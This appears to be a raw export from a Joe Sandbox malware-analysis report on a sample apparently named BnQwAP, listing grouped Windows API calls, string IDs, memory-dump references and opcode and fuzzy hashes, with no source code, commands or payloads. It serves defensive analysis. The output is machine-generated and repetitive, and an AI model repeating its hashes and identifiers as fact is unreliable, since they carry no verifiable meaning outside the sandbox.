                                                                                                                    • String ID:
                                                                                                                    • API String ID: 50796853-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268545403-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3864802216-0
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Enabled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3694350264-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3401586794-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                                                                    • String ID: DllGetClassObject
                                                                                                                    • API String ID: 668425406-1075368562
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: LongMessageSendWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3360111000-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4170576061-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 161812096-0
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 395352322-0
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3220332590-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: f$p
                                                                                                                    • API String ID: 3215553584-1290815066
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 564229958-0
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 0-2263619337
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2592858361-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2082702847-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4278518827-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 839392675-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 146765662-0
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF65607BF47), ref: 00007FF65607CE29
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 2358735015-567219261
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: #$E$O
                                                                                                                    • API String ID: 3215553584-248080428
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 3196045410-1173974218
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 787153527-1403004172
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLasthtonsinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2227131780-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3488606520-0
                                                                                                                    • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                                                    • Instruction ID: 7da2ac90a1d7eeb812dcc38cc48c88a979a1b08143afa6c66cb0270fb6f70fe6
                                                                                                                    • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                                                    • Instruction Fuzzy Hash: BF817D26B0969285EB14DF22D5586AD37A1BB48FD8F088035DE0DA7B96CF3DE805CB40
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                     • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3451389628-0
                                                                                                                    • Opcode ID: adfb7868244c5e1d0bfc560eceff1a8588b273cb05b564dbeb42a9c501cb6717
                                                                                                                    • Instruction ID: 3e379396f9b0b96932b9a54f0162ebb012fad2b7b1ec8b4ab8f24eaf75a95df9
                                                                                                                    • Opcode Fuzzy Hash: adfb7868244c5e1d0bfc560eceff1a8588b273cb05b564dbeb42a9c501cb6717
                                                                                                                    • Instruction Fuzzy Hash: B3718C76B08A428AEB50DF65D1953BD3760FB84B8CF488132DA0EA7A96CF38D509C744
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3659116390-0
                                                                                                                    • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                                                                    • Instruction ID: f3107c4702fb41d53a10bb5ae07e14faa65ffba73ed298826e5ec9e6ef815253
                                                                                                                    • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                                                                    • Instruction Fuzzy Hash: 2151B032A14A518AF710CB65E9843AC7BB0FB48B9CF088135DE4EA7799DF79D14AC700
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3740051246-0
                                                                                                                    • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                                                    • Instruction ID: 951e08564bdd7bf6bfb7458d9ebbc92870db99514b8662692c60a5be73fa4a2d
                                                                                                                    • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                                                    • Instruction Fuzzy Hash: 1661C222A08A8285EB50DF65D4893BD7770FB84B98F484132DB4DA7AA6CF7CD549CB40
                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65607C2BF), ref: 00007FF65607D176
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65607C2BF), ref: 00007FF65607D217
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65607C2BF), ref: 00007FF65607D236
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65607C2BF), ref: 00007FF65607D281
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65607C2BF), ref: 00007FF65607D2A0
                                                                                                                      • Part of subcall function 00007FF656004120: WideCharToMultiByte.KERNEL32 ref: 00007FF656004160
                                                                                                                      • Part of subcall function 00007FF656004120: WideCharToMultiByte.KERNEL32 ref: 00007FF65600419C
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 666041331-0
                                                                                                                    • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                                                    • Instruction ID: cd0c53b93699c3379d463fd6289a9ea9cf4c1ca7f4b7499e095e295747fd53f6
                                                                                                                    • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                                                    • Instruction Fuzzy Hash: 75518B36B14B4285EB40DF62D9881AC73B0FB98F88B494032DE4EA3791DF39D846C710
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4136290138-0
                                                                                                                    • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                                                    • Instruction ID: 83bd058b001d370d17fa325c498fb278c685262fed69f6fdf97fd83cb325211e
                                                                                                                    • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                                                    • Instruction Fuzzy Hash: 43516433624A85D2DB10CF16D5847AD33B5FB94B84F4A8222CB4E93764EF3AE499C701
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2832842796-0
                                                                                                                    • Opcode ID: 5ddcdf5be155bdd7fae183d3f61eaf0ee1945c0c2493d87505c57e9b0a69a627
                                                                                                                    • Instruction ID: b13154360747f4a6b067e5f97e8063c5c57f5f3f3d12d49774014ba6e3f85066
                                                                                                                    • Opcode Fuzzy Hash: 5ddcdf5be155bdd7fae183d3f61eaf0ee1945c0c2493d87505c57e9b0a69a627
                                                                                                                    • Instruction Fuzzy Hash: FC510D36A18A4682EB54DF26D49456D7760FB88F98F088432EF8E97B66CF3DD444C740
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4210589936-0
                                                                                                                    • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                                                    • Instruction ID: ace7874e47d98f0b66ce1f8456f41d9cfe4a9e7e5845f92d2b3ce09880425373
                                                                                                                    • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                                                    • Instruction Fuzzy Hash: 43511536B04A928BE7A4CF36CA445A97761FB45B58F080231EE5AA77D5CF38E851CB00
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                                                    • Instruction ID: 7727537a042906959a80e8ba647ffbdb46e1e60e25e69bfc5545e40723b6da11
                                                                                                                    • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                                                    • Instruction Fuzzy Hash: AE412B21B19A0281FE11AF169E842B56395BF84BD8F1D4535DD1EEB788EF7EE408C300
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$Enable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2939132127-0
                                                                                                                    • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                                    • Instruction ID: 5ef94d23a60aa68465cb096262c3c033a8a621b03f04f8ce4aa2ece3cd5976ba
                                                                                                                    • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                                    • Instruction Fuzzy Hash: 5551623290978681FB51CF15D55467937A1EBC4B88F6C4136DA4EA73A0CE3FE449D710
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3382505437-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2256411358-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2655805287-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2067211477-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_statfp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1156100317-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3897988419-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,00007FF6560429AD,?,?,?,00007FF655FF2AB2), ref: 00007FF65606003C
                                                                                                                    • TerminateThread.KERNEL32(?,?,?,00007FF6560429AD,?,?,?,00007FF655FF2AB2), ref: 00007FF656060047
                                                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,00007FF6560429AD,?,?,?,00007FF655FF2AB2), ref: 00007FF656060055
                                                                                                                    • ~SyncLockT.VCCORLIB ref: 00007FF65606005E
                                                                                                                      • Part of subcall function 00007FF65605F7B8: CloseHandle.KERNEL32(?,?,?,00007FF656060063,?,?,?,00007FF6560429AD,?,?,?,00007FF655FF2AB2), ref: 00007FF65605F7C9
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00007FF6560429AD,?,?,?,00007FF655FF2AB2), ref: 00007FF65606006A
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3142591903-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorExitLastThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611280651-0
                                                                                                                    • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                                                    • Instruction ID: 071d8ae2613c23f5ce696f15b87ace5289bb2906a892ecfb11a3b97a505d3e6f
                                                                                                                    • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                                                    • Instruction Fuzzy Hash: D0018F20B0864292EA096B61EA4413C6262FF40B78F585774D63EA36D1DF3EE95CC300
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2625713937-0
                                                                                                                    • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                                                                    • Instruction ID: 148fb44a3c83206936abac2952a2fc8058315aa98d8fb27ba055be619835d79e
                                                                                                                    • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                                                                    • Instruction Fuzzy Hash: 8D015E2590864385F7559F61FA9833D2772BF45B99F5C4230C51EA72A0EF7EA848C704
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                                                    • Instruction ID: b227607b4f96ce576b4e1509b49c3cc36b7497b6146586e4c7a9c03f2835def0
                                                                                                                    • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                                                    • Instruction Fuzzy Hash: 5DF06D14F1870242FB552BB7BA5927813536F5AB49F8C5430C90AE3291DE7FA89DC640
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                                                    • Instruction ID: 468f25857b352c1bc47c651413891660a82fb54f1afa300f0ad9e7bf7e5f732f
                                                                                                                    • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                                                    • Instruction Fuzzy Hash: 11F03954F1860282FB151BB6BA4927A13526FA9749F8C5430CC0BA3252DD3FA89DCA00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 3769357847-24824748
                                                                                                                    • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                                                    • Instruction ID: 9537262e246fbe97b83ea7c026e8c729797676a4d9becde8038e3ba05077c868
                                                                                                                    • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                                                    • Instruction Fuzzy Hash: 04D18076B18A5685EB10DF66D1902AD37B0FB48F88F484036DE4DA7B55DF3AD889C340
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                                    • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                                                    • Instruction ID: b9d03a017b7b4fb70f97e47681d9640ac682cedb3506c5cc7b89f1bd4116b994
                                                                                                                    • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                                                    • Instruction Fuzzy Hash: 30815BB2E0830286FB654F15DB5027E66A0AF11788F5C8036DA0FF7695DE6FA998D201
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
